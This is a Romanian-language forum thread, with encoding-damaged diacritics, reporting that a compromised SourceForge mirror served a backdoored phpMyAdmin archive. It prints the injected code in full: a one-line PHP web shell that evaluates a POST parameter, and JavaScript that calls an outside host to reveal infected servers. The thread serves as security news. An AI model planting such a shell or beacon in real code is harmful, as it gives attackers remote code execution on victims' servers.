Jump to content
B7ackAnge7z

Backdoor în phpMyAdmin

Recommended Posts

De curând echipa ce r?spunde de securitatea phpMyAdmin a anun?at c? unul din serverele SourceForge.Net a fost compromis, iar la arhiva phpMyAdmin-3.5.2.2-all-languages.zip a fost ad?ugat fi?ierul server_sync.php ce con?ine urm?torul cod PHP:

<?php @eval($_POST['c']); ?>

De asemenea a fost modificat ?i fi?ierul /js/cross_framing_protection.js unde a fost ad?ugat urm?torul cod JavaScript (pentru a afla adresele serverelor infectate):

var icon ;
icon = document.createElement("img");
icon.src="http://logos.phpmyadmin-images.net/logo/logos.jpg";
icon.width=0;
icon.height=0;
document.body.appendChild(icon);

Conform declara?iilor oficiale ale administra?iei SourceForge.Net, aproximativ 400 utilizatori au desc?rcat fi?ierul ce con?ine acest backdoor.

Sursa: Compromised SourceForge mirror

  • Upvote 1
Link to comment
Share on other sites

Si... Cum a ajuns acolo? :-?

Eu speram c? administra?ia SourceForge.Net va publica mai târziu detalii despre ce ?i cum s-a întâmplat acest lucru. Pân? acum — nimic. Îns?, dat fiind faptul c? a fost compromis doar serverul cdnetworks-kr-1.dl.sourceforge.net, putem presupune c? vinovat se face provider-ul ce de?ine(a) acest server.

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...